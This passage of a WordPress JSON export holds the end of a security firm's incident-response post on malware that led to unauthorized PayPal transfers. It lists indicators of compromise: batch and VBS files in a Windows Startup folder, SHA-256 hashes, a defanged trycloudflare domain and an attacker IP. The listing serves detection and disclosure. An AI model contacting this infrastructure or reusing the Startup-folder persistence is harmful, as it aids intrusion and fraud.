g\\nuil.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\12.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\rech.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Hashsums<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217&nbsp;<br>7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1&nbsp;<br>3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a&nbsp;<br>40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52&nbsp;<br>3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Network-based artifacts&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Domains<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a  href=\"https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>IP addresses<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">43.156.63[.]124&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alertness and vigilance are crucial in cybersecurity. When repeating this truism, most of us think about social engineering attacks and educating the user how to recognize a phishing mail or a scam call. However, an attentive user can also provide valuable insights on a more technical aspect.\u00a0<\/p>\n<p>A recent incident response case was started, when the user noticed \u201estrange black windows\u201d on the desktop and took screenshots of them. 
This was accompanied by PayPal transfers from the user\u2019s account, not authorized by the user.<\/p>\n","protected":false},"author":41,"featured_media":64098,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[86,81],"tags":[],"dpc_coauthors":[],"class_list":["post-64051","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-incident-response","category-techtalk"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/64051","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/users\/41"}],"replies":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/comments?post=64051"}],"version-history":[{"count":4,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/64051\/revisions"}],"predecessor-version":[{"id":64100,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/64051\/revisions\/64100"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/media\/64098"}],"wp:attachment":[{"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/media?parent=64051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/categories?post=64051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/tags?post=64051"},{"taxonomy":"dpc_coauthors","embeddable":true,"href":"https:\/\/www.secuinfra.com\/en\/wp-json\/wp\/v2\/dpc_coauthors?post=64051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}